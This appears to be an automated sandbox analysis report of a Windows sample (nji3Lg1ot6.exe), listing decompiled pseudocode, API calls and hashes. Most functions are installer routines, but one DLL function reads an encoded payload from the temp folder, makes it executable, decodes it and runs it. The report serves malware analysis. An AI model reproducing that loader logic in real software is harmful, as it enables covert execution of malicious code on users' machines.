                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: File$Read$PointerWrite
                      • String ID: 80A
                      • API String ID: 2113905535-195308239
                      • Opcode ID: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                      • Instruction ID: 41b23491bffeaa1753be022b97a7ffae9df7beca0cc47644b0b6bde15745b2e9
                      • Opcode Fuzzy Hash: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                      • Instruction Fuzzy Hash: 91310B31901209EFDF21CF55DE84DAE7BB8EB453A5F20403AF504E61E0D2749E41EB69
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 415 40302c-403055 GetTickCount 416 403196-40319e call 402bc5 415->416 417 40305b-403086 call 4031da SetFilePointer 415->417 422 4031a0-4031a5 416->422 423 40308b-40309d 417->423 424 4030a1-4030af call 4031a8 423->424 425 40309f 423->425 428 4030b5-4030c1 424->428 429 403188-40318b 424->429 425->424 430 4030c7-4030cd 428->430 429->422 431 4030f8-403114 call 405e9d 430->431 432 4030cf-4030d5 430->432 438 403191 431->438 439 403116-40311e 431->439 432->431 434 4030d7-4030f7 call 402bc5 432->434 434->431 440 403193-403194 438->440 441 403120-403136 WriteFile 439->441 442 403152-403158 439->442 440->422 443 403138-40313c 441->443 444 40318d-40318f 441->444 442->438 445 40315a-40315c 442->445 443->444 446 40313e-40314a 443->446 444->440 445->438 447 40315e-403171 445->447 446->430 448 403150 446->448 447->423 449 403177-403186 SetFilePointer 447->449 448->447 449->416
                      C-Code - Quality: 94%
                      			E0040302C(intOrPtr _a4) {
                      				long _v4;
                      				void* __ecx;
                      				intOrPtr _t12;
                      				intOrPtr _t13;
                      				signed int _t14;
                      				void* _t16;
                      				void* _t17;
                      				long _t18;
                      				int _t21;
                      				intOrPtr _t22;
                      				intOrPtr _t34;
                      				long _t35;
                      				intOrPtr _t37;
                      				void* _t39;
                      				long _t40;
                      				intOrPtr _t46;
                      				intOrPtr _t47;
                      				intOrPtr _t53;
                      
                      				_t35 =  *0x41703c; // 0x3d90c
                      				_t37 = _t35 -  *0x40afa8 + _a4;
                      				 *0x423eac = GetTickCount() + 0x1f4;
                      				if(_t37 <= 0) {
                      					L23:
                      					E00402BC5(1);
                      					return 0;
                      				}
                      				E004031DA( *0x41f04c);
                      				SetFilePointer( *0x409014,  *0x40afa8, 0, 0); // executed
                      				 *0x41f048 = _t37;
                      				 *0x417038 = 0;
                      				while(1) {
                      					L2:
                      					_t12 =  *0x417040; // 0x3c9ea
                      					_t34 = 0x4000;
                      					_t13 = _t12 -  *0x41f04c;
                      					if(_t13 <= 0x4000) {
                      						_t34 = _t13;
                      					}
                      					_t14 = E004031A8(0x413038, _t34); // executed
                      					if(_t14 == 0) {
                      						break;
                      					}
                      					 *0x41f04c =  *0x41f04c + _t34;
                      					 *0x40afc8 = 0x413038;
                      					 *0x40afcc = _t34;
                      					while(1) {
                      						_t46 =  *0x423eb0; // 0x4de368
                      						if(_t46 != 0) {
                      							_t47 =  *0x423f40; // 0x0
                      							if(_t47 == 0) {
                      								_t22 =  *0x41f048; // 0xc1b
                      								 *0x417038 = _t22 -  *0x41703c - _a4 +  *0x40afa8;
                      								E00402BC5(0);
                      							}
                      						}
                      						 *0x40afd0 = 0x40b038;
                      						 *0x40afd4 = 0x8000; // executed
                      						_t16 = E00405E9D(0x40afb0); // executed
                      						if(_t16 < 0) {
                      							break;
                      						}
                      						_t39 =  *0x40afd0; // 0x40ce57
                      						_t40 = _t39 - 0x40b038;
                      						if(_t40 == 0) {
                      							__eflags =  *0x40afcc; // 0x0
                      							if(__eflags != 0) {
                      								break;
                      							}
                      							__eflags = _t34;
                      							if(_t34 == 0) {
                      								break;
                      							}
                      							L17:
                      							_t18 =  *0x41703c; // 0x3d90c
                      							if(_t18 -  *0x40afa8 + _a4 > 0) {
                      								goto L2;
                      							}
                      							SetFilePointer( *0x409014, _t18, 0, 0); // executed
                      							goto L23;
                      						}
                      						_t21 = WriteFile( *0x409014, 0x40b038, _t40,  &_v4, 0); // executed
                      						if(_t21 == 0 || _t40 != _v4) {
                      							_push(0xfffffffe);
                      							L22:
                      							_pop(_t17);
                      							return _t17;
                      						} else {
                      							 *0x40afa8 =  *0x40afa8 + _t40;
                      							_t53 =  *0x40afcc; // 0x0
                      							if(_t53 != 0) {
                      								continue;
                      							}
                      							goto L17;
                      						}
                      					}
                      					_push(0xfffffffd);
                      					goto L22;
                      				}
                      				return _t14 | 0xffffffff;
                      			}






















                      APIs
                      • GetTickCount.KERNEL32 ref: 00403041
                        • Part of subcall function 004031DA: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,00007DE4), ref: 004031E8
                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000), ref: 00403074
                      • WriteFile.KERNELBASE(0040B038,0040CE57,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 0040312E
                      • SetFilePointer.KERNELBASE(0003D90C,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 00403180
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: File$Pointer$CountTickWrite
                      • String ID: 80A$hM
                      • API String ID: 2146148272-943072739
                      • Opcode ID: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                      • Instruction ID: 8653c145dc750015188d6a9afa30315cb9c5a6a6900809742879fa1bd1138a56
                      • Opcode Fuzzy Hash: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                      • Instruction Fuzzy Hash: 74417FB2504302AFD7109F19EE8496A3FBCF748396710813BE511B62F1C7386A559BAE
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 450 401f51-401f5d 451 401f63-401f79 call 4029e8 * 2 450->451 452 40200b-40200d 450->452 461 401f88-401f96 LoadLibraryExA 451->461 462 401f7b-401f86 GetModuleHandleA 451->462 453 402156-40215b call 401423 452->453 460 40287d-40288c 453->460 464 401f98-401fa6 GetProcAddress 461->464 465 402004-402006 461->465 462->461 462->464 467 401fe5-401fea call 404e23 464->467 468 401fa8-401fae 464->468 465->453 472 401fef-401ff2 467->472 470 401fb0-401fbc call 401423 468->470 471 401fc7-401fde call 72fb10a0 468->471 470->472 478 401fbe-401fc5 470->478 476 401fe0-401fe3 471->476 472->460 474 401ff8-401fff FreeLibrary 472->474 474->460 476->472 478->472
                      C-Code - Quality: 57%
                      			E00401F51(void* __ebx, void* __eflags) {
                      				struct HINSTANCE__* _t18;
                      				struct HINSTANCE__* _t25;
                      				void* _t26;
                      				struct HINSTANCE__* _t29;
                      				CHAR* _t31;
                      				intOrPtr* _t32;
                      				void* _t33;
                      
                      				_t26 = __ebx;
                      				asm("sbb eax, 0x423f58");
                      				 *(_t33 - 4) = 1;
                      				if(__eflags < 0) {
                      					_push(0xffffffe7);
                      					L14:
                      					E00401423();
                      					L15:
                      					 *0x423f28 =  *0x423f28 +  *(_t33 - 4);
                      					return 0;
                      				}
                      				_t31 = E004029E8(0xfffffff0);
                      				 *(_t33 + 8) = E004029E8(1);
                      				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
                      					L3:
                      					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
                      					_t29 = _t18;
                      					if(_t29 == _t26) {
                      						_push(0xfffffff6);
                      						goto L14;
                      					}
                      					L4:
                      					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
                      					if(_t32 == _t26) {
                      						E00404E23(0xfffffff7,  *(_t33 + 8));
                      					} else {
                      						 *(_t33 - 4) = _t26;
                      						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
                      							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x424000, 0x40af68, " ?B"); // executed
                      						} else {
                      							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
                      							if( *_t32() != 0) {
                      								 *(_t33 - 4) = 1;
                      							}
                      						}
                      					}
                      					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
                      						FreeLibrary(_t29);
                      					}
                      					goto L15;
                      				}
                      				_t25 = GetModuleHandleA(_t31); // executed
                      				_t29 = _t25;
                      				if(_t29 != __ebx) {
                      					goto L4;
                      				}
                      				goto L3;
                      			}











                      APIs
                      • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                        • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                        • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                        • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                        • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                        • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                        • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                        • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                      • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                      • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                      • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                      • String ID: ?B
                      • API String ID: 2987980305-117478770
                      • Opcode ID: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                      • Instruction ID: 6286e611532d8822c51d7e946ff34bbadf458e6cc54079b264412ac530ebcb8a
                      • Opcode Fuzzy Hash: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                      • Instruction Fuzzy Hash: 9611E772D04216EBCF107FA4DE89EAE75B0AB44359F20423BF611B62E0C77C8941DA5E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 480 4015b3-4015c6 call 4029e8 call 40560c 485 4015c8-4015e3 call 4055a3 CreateDirectoryA 480->485 486 40160a-40160d 480->486 493 401600-401608 485->493 494 4015e5-4015f0 GetLastError 485->494 487 40162d-40215b call 401423 486->487 488 40160f-401628 call 401423 call 405a85 SetCurrentDirectoryA 486->488 502 40287d-40288c 487->502 488->502 493->485 493->486 497 4015f2-4015fb GetFileAttributesA 494->497 498 4015fd 494->498 497->493 497->498 498->493
                      C-Code - Quality: 85%
                      			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
                      				struct _SECURITY_ATTRIBUTES** _t10;
                      				int _t19;
                      				struct _SECURITY_ATTRIBUTES* _t20;
                      				signed char _t22;
                      				struct _SECURITY_ATTRIBUTES* _t23;
                      				CHAR* _t25;
                      				struct _SECURITY_ATTRIBUTES** _t29;
                      				void* _t30;
                      
                      				_t23 = __ebx;
                      				_t25 = E004029E8(0xfffffff0);
                      				_t10 = E0040560C(_t25);
                      				_t27 = _t10;
                      				if(_t10 != __ebx) {
                      					do {
                      						_t29 = E004055A3(_t27, 0x5c);
                      						 *_t29 = _t23;
                      						 *((char*)(_t30 + 0xb)) =  *_t29;
                      						_t19 = CreateDirectoryA(_t25, _t23); // executed
                      						if(_t19 == 0) {
                      							if(GetLastError() != 0xb7) {
                      								L4:
                      								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
                      							} else {
                      								_t22 = GetFileAttributesA(_t25); // executed
                      								if((_t22 & 0x00000010) == 0) {
                      									goto L4;
                      								}
                      							}
                      						}
                      						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                      						 *_t29 = _t20;
                      						_t27 =  &(_t29[0]);
                      					} while (_t20 != _t23);
                      				}
                      				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
                      					_push(0xfffffff5);
                      					E00401423();
                      				} else {
                      					E00401423(0xffffffe6);
                      					E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t25);
                      					SetCurrentDirectoryA(_t25); // executed
                      				}
                      				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
                      				return 0;
                      			}












                      APIs
                        • Part of subcall function 0040560C: CharNextA.USER32(004053BE,?,004218A0,00000000,00405670,004218A0,004218A0,?,?,74E5F560,004053BE,?,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,74E5F560), ref: 0040561A
                        • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040561F
                        • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040562E
                      • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                      • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                      • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                      Strings
                      • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                      • String ID: C:\Users\user\AppData\Local\Temp
                      • API String ID: 3751793516-501415292
                      • Opcode ID: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                      • Instruction ID: 11ba4fe5436512bc7837d50811c3794abd92905400bb47a2e3f09ad75438aea6
                      • Opcode Fuzzy Hash: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                      • Instruction Fuzzy Hash: B3010431908150AFDB116FB51D44D7F67B0AA56365768073BF491B22E2C63C4942D62E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 505 40578b-405795 506 405796-4057c0 GetTickCount GetTempFileNameA 505->506 507 4057c2-4057c4 506->507 508 4057cf-4057d1 506->508 507->506 509 4057c6 507->509 510 4057c9-4057cc 508->510 509->510
                      C-Code - Quality: 100%
                      			E0040578B(char _a4, intOrPtr _a6, CHAR* _a8) {
                      				signed int _t11;
                      				int _t14;
                      				signed int _t16;
                      				void* _t19;
                      				CHAR* _t20;
                      
                      				_t20 = _a4;
                      				_t19 = 0x64;
                      				while(1) {
                      					_t19 = _t19 - 1;
                      					_a4 = 0x61736e;
                      					_t11 = GetTickCount();
                      					_t16 = 0x1a;
                      					_a6 = _a6 + _t11 % _t16;
                      					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                      					if(_t14 != 0) {
                      						break;
                      					}
                      					if(_t19 != 0) {
                      						continue;
                      					}
                      					 *_t20 =  *_t20 & 0x00000000;
                      					return _t14;
                      				}
                      				return _t20;
                      			}









                      APIs
                      • GetTickCount.KERNEL32 ref: 0040579E
                      • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004057B8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: CountFileNameTempTick
                      • String ID: "C:\Users\user\Desktop\nji3Lg1ot6.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                      • API String ID: 1716503409-332413507
                      • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                      • Instruction ID: 4fcdc00fff711095840056c8ed2a58f2bfde19b521d5dac465ae6a1bf3f6778c
                      • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                      • Instruction Fuzzy Hash: F9F0A736348304B6D7104E55DC04B9B7F69DF91750F14C02BFA449B1C0D6B0995497A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 76%
                      			E72FB10A0(void* __ecx, void* __eflags) {
                      				short _v8;
                      				short _v10;
                      				short _v12;
                      				short _v14;
                      				short _v16;
                      				short _v18;
                      				short _v20;
                      				short _v22;
                      				char _v24;
                      				void* _v28;
                      				long _v32;
                      				long _v36;
                      				short _v1076;
                      				void _v5848;
                      				void* _t35;
                      				intOrPtr _t38;
                      				struct _OVERLAPPED* _t70;
                      				void* _t78;
                      
                      				E72FB1000(0x16d4, __ecx);
                      				_v24 = 0x70;
                      				_v22 = 0x61;
                      				_v20 = 0x77;
                      				_v18 = 0x67;
                      				_v16 = 0x6a;
                      				_v14 = 0x73;
                      				_v12 = 0x76;
                      				_v10 = 0x75;
                      				_v8 = 0;
                      				GetTempPathW(0x103,  &_v1076);
                      				E72FB1030( &_v1076,  &_v24);
                      				VirtualProtect( &_v5848, 0x12a1, 0x40,  &_v32); // executed
                      				_t35 = CreateFileW( &_v1076, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                      				_v28 = _t35;
                      				ReadFile(_v28,  &_v5848, 0x12a1,  &_v36, 0); // executed
                      				_t70 = 0;
                      				while(1) {
                      					_t38 =  *((intOrPtr*)(_t78 + _t70 - 0x16d4));
                      					if(_t70 == 0x12a1) {
                      						break;
                      					}
                      					 *((char*)(_t78 + _t70 - 0x16d4)) = ((((_t38 - 0x00000001 + 0x54 ^ 0x00000005) + 0x00000001 - 0xffffffffffffff94 ^ 0x000000e9) + 0xfb - 0x00000001 + 0x00000017 ^ 0x00000098) + 0x00000053 - 0x0000001f ^ 0x91) - 0xcb;
                      					_t70 =  &(_t70->Internal);
                      				}
                      				_v5848();
                      				return 0;
                      			}






















                      APIs
                      • GetTempPathW.KERNEL32(00000103,?), ref: 72FB1107
                      • VirtualProtect.KERNELBASE(?,000012A1,00000040,?), ref: 72FB1132
                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 72FB1151
                      • ReadFile.KERNELBASE(?,?,000012A1,?,00000000), ref: 72FB1170
                      Memory Dump Source
                      • Source File: 00000000.00000002.295878216.0000000072FB1000.00000020.00020000.sdmp, Offset: 72FB0000, based on PE: true
                      • Associated: 00000000.00000002.295873811.0000000072FB0000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295896531.0000000072FB2000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72fb0000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: File$CreatePathProtectReadTempVirtual
                      • String ID:
                      • API String ID: 205760209-0
                      • Opcode ID: 12e095a8cb45485f49eb404071e3197b5a0e95d0326cb5ce4f7fdfc7da6cdb05
                      • Instruction ID: b17f98d16d46567d7659439a7d6b5928e9608641675a7d394b233a3ba5b1522b
                      • Opcode Fuzzy Hash: 12e095a8cb45485f49eb404071e3197b5a0e95d0326cb5ce4f7fdfc7da6cdb05
                      • Instruction Fuzzy Hash: 7E31C271E14208ABFB00CBB1DC51BEE7335EF14740F106468E309EB680E6795B02CB69
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 603 401389-40138e 604 4013fa-4013fc 603->604 605 401390-4013a0 604->605 606 4013fe 604->606 605->606 608 4013a2-4013a3 call 401434 605->608 607 401400-401401 606->607 610 4013a8-4013ad 608->610 611 401404-401409 610->611 612 4013af-4013b7 call 40136d 610->612 611->607 615 4013b9-4013bb 612->615 616 4013bd-4013c2 612->616 617 4013c4-4013c9 615->617 616->617 617->604 618 4013cb-4013f4 MulDiv SendMessageA 617->618 618->604
                      C-Code - Quality: 69%
                      			E00401389(signed int _a4) {
                      				intOrPtr* _t6;
                      				void* _t8;
                      				void* _t10;
                      				signed int _t11;
                      				void* _t12;
                      				intOrPtr _t15;
                      				signed int _t16;
                      				signed int _t17;
                      				void* _t18;
                      
                      				_t17 = _a4;
                      				while(_t17 >= 0) {
                      					_t15 =  *0x423ed0; // 0x4ded44
                      					_t6 = _t17 * 0x1c + _t15;
                      					if( *_t6 == 1) {
                      						break;
                      					}
                      					_push(_t6); // executed
                      					_t8 = E00401434(); // executed
                      					if(_t8 == 0x7fffffff) {
                      						return 0x7fffffff;
                      					}
                      					_t10 = E0040136D(_t8);
                      					if(_t10 != 0) {
                      						_t11 = _t10 - 1;
                      						_t16 = _t17;
                      						_t17 = _t11;
                      						_t12 = _t11 - _t16;
                      					} else {
                      						_t12 = _t10 + 1;
                      						_t17 = _t17 + 1;
                      					}
                      					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                      						 *0x42368c =  *0x42368c + _t12;
                      						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
                      					}
                      				}
                      				return 0;
                      			}













                      APIs
                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                      • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: DM
                      • API String ID: 3850602802-1917389839
                      • Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                      • Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
                      • Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                      • Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 84%
                      			E004031F1(void* __eflags) {
                      				void* _t2;
                      				void* _t5;
                      				CHAR* _t6;
                      
                      				_t6 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
                      				E00405CE3(_t6);
                      				_t2 = E004055E5(_t6);
                      				if(_t2 != 0) {
                      					E00405578(_t6);
                      					CreateDirectoryA(_t6, 0); // executed
                      					_t5 = E0040578B("1033", _t6); // executed
                      					return _t5;
                      				} else {
                      					return _t2;
                      				}
                      			}







                      APIs
                        • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                        • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                        • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                        • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                      • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00403212
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: Char$Next$CreateDirectoryPrev
                      • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                      • API String ID: 4115351271-1075807775
                      • Opcode ID: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                      • Instruction ID: 52f5018bb87fe832e559484150a565c10a299960058697363e648776ae6da385
                      • Opcode Fuzzy Hash: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                      • Instruction Fuzzy Hash: 68D0C92164AD3036D551372A3D0AFDF090D9F4272EF21417BF804B50CA5B6C6A8319EF
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 99%
                      			E00406481() {
                      				signed int _t530;
                      				void _t537;
                      				signed int _t538;
                      				signed int _t539;
                      				unsigned short _t569;
                      				signed int _t579;
                      				signed int _t607;
                      				void* _t627;
                      				signed int _t628;
                      				signed int _t635;
                      				signed int* _t643;
                      				void* _t644;
                      
                      				L0:
                      				while(1) {
                      					L0:
                      					_t530 =  *(_t644 - 0x30);
                      					if(_t530 >= 4) {
                      					}
                      					 *(_t644 - 0x40) = 6;
                      					 *(_t644 - 0x7c) = 0x19;
                      					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                      					while(1) {
                      						L145:
                      						 *(_t644 - 0x50) = 1;
                      						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                      						while(1) {
                      							L149:
                      							if( *(_t644 - 0x48) <= 0) {
                      								goto L155;
                      							}
                      							L150:
                      							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
